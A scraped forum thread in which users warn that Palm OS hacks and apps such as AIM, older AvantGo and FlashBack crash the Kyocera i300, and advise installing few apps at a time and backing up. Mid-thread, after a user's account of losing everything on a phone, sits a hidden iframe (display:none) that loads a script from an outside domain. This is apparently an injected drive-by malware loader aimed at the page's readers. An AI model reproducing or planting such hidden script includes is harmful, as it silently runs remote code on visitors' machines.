Post palm os hacks not for i300

folks the old term or buyer beware is still true today.

MANY OF THE HACKS ON WEBPAGES ARE NOT FOR THE I300 AND NEVER WILL BE.

just because they may claim that they are compatible with 3.x and higher doesnt mean they are for and wont affect the i300.

i have seen many units come in for repairs that are not covered under any warranty because users have stupidly put hacks on their i300 for mp3 players and video movie galleries and the etc.

this is probably why your unit crashes left and right and you are losing your data on an hourly basis.

KNOW YOUR UNIT AND ITS CAPABILITIES PLEASE!!!!!!!!

btw i have living proof of an i300 right here in my hands, itried to install a hack and completely lost everything to do with the phone!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Let's be specific, which hacks are dangerous and known to cause problems?

its not just "one" hack or two... its just some combinations of hacks/software.

there is not a list per se, but a good rule of thumb is to not install a bunch of apps at one time... just do one or two and monitor their behavior. and go from there.

for example, AIM crashed the i300 (and 6035) very badly. an older version of avantgo crashed the i300, but the latest avantgo client worked just fine on my i330...

so just be careful what you install and make sure you really understand its requirements and you will be fine.

    and alswyas... back up daily!

also for avantgo users they have fixed the problem with the i500 not syncing using ag connect.....(sprint screwed up on the server settings)

I've just spent the morning continually reflashing my 300, but at least I don't have a brick. I use a number of hacks (slight incompatibilities with evedit, mainly dealing with menu selection, but livable). I also use FlashPro, and (on my 500 and Vx) I use something called FlashBack, which can move one's memopad, datebook, address, and todo db's to flash.

It crashes very very hard on a 300. A pleasant warning.
